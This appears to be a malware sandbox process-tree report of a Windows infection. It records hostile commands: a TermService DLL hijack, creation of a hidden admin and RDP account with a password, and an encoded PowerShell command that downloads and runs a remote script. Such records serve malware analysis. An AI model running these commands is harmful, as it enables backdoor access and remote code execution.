    "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
    3⤵
    - Modifies registry key
    PID:1820
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
    3⤵
    PID:1876
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" localgroup Administrators NT-AUTORITÄT\NETZWERKDIENST /add
    3⤵
    PID:2668
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup Administrators NT-AUTORITÄT\NETZWERKDIENST /add
      4⤵
      PID:2120
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
    3⤵
    PID:1676
  - - C:\Windows\system32\cmd.exe
      cmd /c net start rdpdr
      4⤵
      PID:2100
    - - C:\Windows\system32\net.exe
        
        net start rdpdr
        5⤵
        
        PID:2520
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
    3⤵
    PID:2200
  - - C:\Windows\system32\cmd.exe
      cmd /c net start TermService
      4⤵
      PID:376
    - - C:\Windows\system32\net.exe
        
        net start TermService
        5⤵
        
        PID:2364
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start TermService
        6⤵
        
        PID:1596
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
    3⤵
    PID:2820
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
    3⤵
    PID:2668

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Modifies firewall policy service
- Enumerates connected drives
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies data under HKEY_USERS
- Modifies registry class
PID:2828
- C:\Windows\system32\MsiExec.exe
  C:\Windows\system32\MsiExec.exe -Embedding E90FFC8CD727473C2EDCC256241817D4
  2⤵
  PID:2740
- - C:\Windows\system32\lodctr.exe
    "C:\Windows\system32\lodctr.exe" "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\netmemorycache.ini"
    3⤵
    PID:2548
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regiis.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regiis.exe" -iru
    3⤵
    - Executes dropped EXE
    - Drops file in System32 directory
    - Drops file in Windows directory
    PID:1560
  - - C:\Windows\system32\wbem\mofcomp.exe
      mofcomp C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet.mof
      4⤵
      Executes dropped EXE
      PID:2528
- - C:\Windows\system32\lodctr.exe
    "C:\Windows\system32\lodctr.exe" /m:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ServiceModelPerformanceCounters.man"
    3⤵
    PID:992
- - C:\Windows\system32\lodctr.exe
    "C:\Windows\system32\lodctr.exe" /m:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\WorkflowServiceHostPerformanceCounters.man"
    3⤵
    PID:1508
- - C:\Windows\system32\lodctr.exe
    "C:\Windows\system32\lodctr.exe" "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\_SMSvcHostPerfCounters.ini"
    3⤵
    PID:1936
- - C:\Windows\system32\lodctr.exe
    "C:\Windows\system32\lodctr.exe" "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\_TransactionBridgePerfCounters.ini"
    3⤵
    - Drops file in System32 directory
    - Drops file in Windows directory
    PID:2676
- - C:\Windows\system32\lodctr.exe
    "C:\Windows\system32\lodctr.exe" "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\PerfCounters.ini"
    3⤵
    PID:2284
- - C:\Windows\system32\lodctr.exe
    "C:\Windows\system32\lodctr.exe" C:\Windows\Microsoft.NET\Framework64\v4.0.30319\_Networkingperfcounters.ini
    3⤵
    PID:2876
- - C:\Windows\system32\lodctr.exe
    "C:\Windows\system32\lodctr.exe" C:\Windows\Microsoft.NET\Framework64\v4.0.30319\_DataOracleClientPerfCounters_shared12_neutral.ini
    3⤵
    PID:992
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe update /queue
    3⤵
    - Executes dropped EXE
    PID:2884
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems 1
    3⤵
    - Executes dropped EXE
    PID:316
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 130 -InterruptEvent 0 -NGENProcess e8 -Pipe f4 -Comment "NGen Worker Process"
      4⤵
      PID:940
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent e8 -InterruptEvent 0 -NGENProcess 18c -Pipe 138 -Comment "NGen Worker Process"
      4⤵
      Executes dropped EXE
      PID:1936
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding C133BB765D2227DB5FB6A586A72A4EB6
  2⤵
  PID:560
- - C:\Windows\SysWOW64\lodctr.exe
    "C:\Windows\SysWOW64\lodctr.exe" "C:\Windows\Microsoft.NET\Framework\v4.0.30319\netmemorycache.ini"
    3⤵
    PID:2800
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe" -iru
    3⤵
    PID:1124
  - - C:\Windows\SysWOW64\wbem\mofcomp.exe
      mofcomp C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet.mof
      4⤵
      PID:2772
- - C:\Windows\SysWOW64\lodctr.exe
    "C:\Windows\SysWOW64\lodctr.exe" /m:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelPerformanceCounters.man"
    3⤵
    PID:1408
- - C:\Windows\SysWOW64\lodctr.exe
    "C:\Windows\SysWOW64\lodctr.exe" /m:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\WorkflowServiceHostPerformanceCounters.man"
    3⤵
    PID:2672
- - C:\Windows\SysWOW64\lodctr.exe
    "C:\Windows\SysWOW64\lodctr.exe" "C:\Windows\Microsoft.NET\Framework\v4.0.30319\_SMSvcHostPerfCounters.ini"
    3⤵
    - Executes dropped EXE
    PID:2964
- - C:\Windows\SysWOW64\lodctr.exe
    "C:\Windows\SysWOW64\lodctr.exe" "C:\Windows\Microsoft.NET\Framework\v4.0.30319\_TransactionBridgePerfCounters.ini"
    3⤵
    PID:1784
- - C:\Windows\SysWOW64\lodctr.exe
    "C:\Windows\SysWOW64\lodctr.exe" "C:\Windows\Microsoft.NET\Framework\v4.0.30319\PerfCounters.ini"
    3⤵
    - Executes dropped EXE
    PID:1552
- - C:\Windows\SysWOW64\lodctr.exe
    "C:\Windows\SysWOW64\lodctr.exe" C:\Windows\Microsoft.NET\Framework\v4.0.30319\_Networkingperfcounters.ini
    3⤵
    - Drops file in Windows directory
    PID:2572
- - C:\Windows\SysWOW64\lodctr.exe
    "C:\Windows\SysWOW64\lodctr.exe" C:\Windows\Microsoft.NET\Framework\v4.0.30319\_DataOracleClientPerfCounters_shared12_neutral.ini
    3⤵
    PID:1828
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe update /queue
    3⤵
    PID:2520
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe executeQueuedItems 1
    3⤵
    PID:268
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 144 -InterruptEvent 0 -NGENProcess 104 -Pipe 110 -Comment "NGen Worker Process"
      4⤵
      Executes dropped EXE
      PID:2292
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 104 -InterruptEvent 0 -NGENProcess 1a0 -Pipe 14c -Comment "NGen Worker Process"
      4⤵
      Executes dropped EXE
      PID:2304
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1a8 -InterruptEvent 0 -NGENProcess 10c -Pipe 1a0 -Comment "NGen Worker Process"
      4⤵
      Executes dropped EXE
      PID:2116
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1ac -InterruptEvent 0 -NGENProcess 104 -Pipe 10c -Comment "NGen Worker Process"
      4⤵
      PID:2208
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1b0 -InterruptEvent 0 -NGENProcess 1a8 -Pipe 104 -Comment "NGen Worker Process"
      4⤵
      PID:2488
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1b4 -InterruptEvent 0 -NGENProcess 1ac -Pipe 1a8 -Comment "NGen Worker Process"
      4⤵
      PID:2072
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1b8 -InterruptEvent 0 -NGENProcess 1b0 -Pipe 1ac -Comment "NGen Worker Process"
      4⤵
      PID:2252
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1bc -InterruptEvent 0 -NGENProcess 1b4 -Pipe 1b0 -Comment "NGen Worker Process"
      4⤵
      PID:1784
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1c0 -InterruptEvent 0 -NGENProcess 1b8 -Pipe 1b4 -Comment "NGen Worker Process"
      4⤵
      PID:2520
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1c4 -InterruptEvent 0 -NGENProcess 1bc -Pipe 1b8 -Comment "NGen Worker Process"
      4⤵
      PID:2876
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1c8 -InterruptEvent 0 -NGENProcess 1c0 -Pipe 1bc -Comment "NGen Worker Process"
      4⤵
      PID:1760
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1cc -InterruptEvent 0 -NGENProcess 1c4 -Pipe 1c0 -Comment "NGen Worker Process"
      4⤵
      PID:1856
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1d0 -InterruptEvent 0 -NGENProcess 1c8 -Pipe 1c4 -Comment "NGen Worker Process"
      4⤵
      PID:1672
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1d4 -InterruptEvent 0 -NGENProcess 1cc -Pipe 1c8 -Comment "NGen Worker Process"
      4⤵
      Drops file in System32 directory
      PID:3036
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1d8 -InterruptEvent 0 -NGENProcess 1d0 -Pipe 1cc -Comment "NGen Worker Process"
      4⤵
      PID:2208
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1dc -InterruptEvent 0 -NGENProcess 1d4 -Pipe 1d0 -Comment "NGen Worker Process"
      4⤵
      Executes dropped EXE
      PID:1776
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1e0 -InterruptEvent 0 -NGENProcess 1d8 -Pipe 1d4 -Comment "NGen Worker Process"
      4⤵
      PID:2816
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1e4 -InterruptEvent 0 -NGENProcess 1dc -Pipe 1d8 -Comment "NGen Worker Process"
      4⤵
      PID:2436
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1e8 -InterruptEvent 0 -NGENProcess 1e0 -Pipe 1dc -Comment "NGen Worker Process"
      4⤵
      PID:436
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1ec -InterruptEvent 0 -NGENProcess 1e4 -Pipe 1e0 -Comment "NGen Worker Process"
      4⤵
      PID:2428
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1f0 -InterruptEvent 0 -NGENProcess 1e8 -Pipe 1e4 -Comment "NGen Worker Process"
      4⤵
      Executes dropped EXE
      Drops file in System32 directory
      PID:2528
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1f4 -InterruptEvent 0 -NGENProcess 1ec -Pipe 1e8 -Comment "NGen Worker Process"
      4⤵
      PID:1408
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1f8 -InterruptEvent 0 -NGENProcess 1f0 -Pipe 1ec -Comment "NGen Worker Process"
      4⤵
      PID:1508
- C:\Windows\system32\MsiExec.exe
  C:\Windows\system32\MsiExec.exe -Embedding 7D204689C065C4A051575EF3B2CFED0E M Global\MSI0000
  2⤵
  PID:2564
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ServiceModelReg.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ServiceModelReg.exe" -msi -ia -v
    3⤵
    PID:1872
  - - C:\Windows\system32\wevtutil.exe
      um C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Windows.ApplicationServer.Applications.45.man
      4⤵
      PID:2056
  - - C:\Windows\system32\wevtutil.exe
      im C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Windows.ApplicationServer.Applications.45.man
      4⤵
      PID:2168
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regtlibv12.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regtlibv12.exe" "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.JScript.tlb"
    3⤵
    PID:2672
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regtlibv12.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regtlibv12.exe" "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoree.tlb"
    3⤵
    PID:2964
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regtlibv12.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regtlibv12.exe" "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.tlb"
    3⤵
    - Executes dropped EXE
    PID:980
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regtlibv12.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regtlibv12.exe" "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Drawing.tlb"
    3⤵
    - Executes dropped EXE
    - Modifies registry class
    PID:2976
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regtlibv12.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regtlibv12.exe" "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.EnterpriseServices.tlb"
    3⤵
    PID:1552
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regtlibv12.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regtlibv12.exe" "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.tlb"
    3⤵
    - Executes dropped EXE
    PID:2200
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regtlibv12.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regtlibv12.exe" "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Windows.Forms.tlb"
    3⤵
    - Executes dropped EXE
    PID:1372
- - C:\Windows\system32\wbem\mofcomp.exe
    "C:\Windows\system32\wbem\mofcomp.exe" "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MOF\ServiceModel.mof"
    3⤵
    PID:3036
- - C:\Windows\system32\wbem\mofcomp.exe
    "C:\Windows\system32\wbem\mofcomp.exe" "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MOF\ServiceModel35.mof"
    3⤵
    PID:2676
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 7E4D66E959BAC92462AEAD50541529F4 M Global\MSI0000
  2⤵
  PID:2408
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe" -msi -ia -v
    3⤵
    PID:2528
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\regtlibv12.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regtlibv12.exe" "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Microsoft.JScript.tlb"
    3⤵
    - Executes dropped EXE
    PID:2592
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\regtlibv12.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regtlibv12.exe" "C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoree.tlb"
    3⤵
    PID:976
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\regtlibv12.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regtlibv12.exe" "C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.tlb"
    3⤵
    PID:952
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\regtlibv12.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regtlibv12.exe" "C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.Drawing.tlb"
    3⤵
    - Executes dropped EXE
    PID:2660
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\regtlibv12.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regtlibv12.exe" "C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.EnterpriseServices.tlb"
    3⤵
    - Executes dropped EXE
    PID:2804
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\regtlibv12.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regtlibv12.exe" "C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.tlb"
    3⤵
    PID:1776
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\regtlibv12.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regtlibv12.exe" "C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.Windows.Forms.tlb"
    3⤵
    - Executes dropped EXE
    PID:1720
- - C:\Windows\SysWOW64\wbem\mofcomp.exe
    "C:\Windows\SysWOW64\wbem\mofcomp.exe" "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MOF\ServiceModel.mof"
    3⤵
    PID:1596
- - C:\Windows\SysWOW64\wbem\mofcomp.exe
    "C:\Windows\SysWOW64\wbem\mofcomp.exe" "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MOF\ServiceModel35.mof"
    3⤵
    PID:1328

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start rdpdr
1⤵
PID:2460

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc 000000 /del
1⤵
PID:1780
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc 000000 /del
  2⤵
  PID:436
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:2640

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc rngXP2Y0 /add
1⤵
PID:2304
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc rngXP2Y0 /add
  2⤵
  PID:1732
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc rngXP2Y0 /add
    3⤵
    PID:1664

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
1⤵
PID:2548
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
  2⤵
  PID:3016
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
    3⤵
    PID:1776

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-5455330820357804737959864511626874619106620782447937826-1647649178-792118533"
1⤵
PID:544

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" JZCKHXIN$ /ADD
1⤵
PID:2592
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" JZCKHXIN$ /ADD
  2⤵
  PID:1032
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" JZCKHXIN$ /ADD
    3⤵
    PID:2468

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
1⤵
PID:2680
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:2772
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
    3⤵
    PID:812

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc rngXP2Y0
1⤵
PID:980
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc rngXP2Y0
  2⤵
  PID:2356
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc rngXP2Y0
    3⤵
    PID:2676

C:\Windows\System32\cmd.exe
cmd.exe /C wmic path win32_VideoController get name
1⤵
PID:1760
- C:\Windows\System32\Wbem\WMIC.exe
  wmic path win32_VideoController get name
  2⤵
  - Modifies data under HKEY_USERS
  PID:2332

C:\Windows\System32\cmd.exe
cmd.exe /C wmic CPU get NAME
1⤵
PID:2168
- C:\Windows\System32\Wbem\WMIC.exe
  wmic CPU get NAME
  2⤵
  PID:2520

C:\Windows\System32\cmd.exe
cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
1⤵
PID:2628
- C:\Windows\system32\cmd.exe
  cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
  2⤵
  PID:608
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    3⤵
    - Blocklisted process makes network request
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
    PID:2240

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1804436343671006892-501587101736448749-1040118917-1598488509666211981980478415"
1⤵
PID:3016

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "152746753197267231613619182744992400011847751831-19940778851908227397-2004440618"
1⤵
- Modifies data under HKEY_USERS
PID:2520

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "67544761-5478412791071149349-617541393-74516030-2037743284-824518068-640300968"
1⤵
PID:2100

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1401093695-8846243593135034794350367183167995109239469773749443773043076"
1⤵
PID:376

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "305492483-9154910701905236793-361332596204443003168146231720630700441131362982"
1⤵
PID:944

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1820613917-903574312-20931351121526093623-186079094316977922721846512083-1818306082"
1⤵
- Executes dropped EXE
PID:952

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "404943960-2146535875116179086017253432361852740703844944614-14534415061626944811"
1⤵
PID:2680

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1228824240216287248-2055579263-682978050-1592360010-288533646-1830734484411698413"
1⤵
- Drops file in System32 directory
PID:1328

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
1⤵
- Executes dropped EXE
PID:1136
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 198 -InterruptEvent 184 -NGENProcess 188 -Pipe 194 -Comment "NGen Worker Process"
  2⤵
  PID:1708
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 190 -InterruptEvent 1fc -NGENProcess 204 -Pipe 208 -Comment "NGen Worker Process"
  2⤵
  PID:328
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 1fc -InterruptEvent 184 -NGENProcess 1a0 -Pipe 1f8 -Comment "NGen Worker Process"
  2⤵
  - Drops file in System32 directory
  PID:2772
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 184 -InterruptEvent 20c -NGENProcess 1f4 -Pipe 1e4 -Comment "NGen Worker Process"
  2⤵
  PID:2160
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 20c -InterruptEvent 190 -NGENProcess 198 -Pipe 214 -Comment "NGen Worker Process"
  2⤵
  PID:556
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
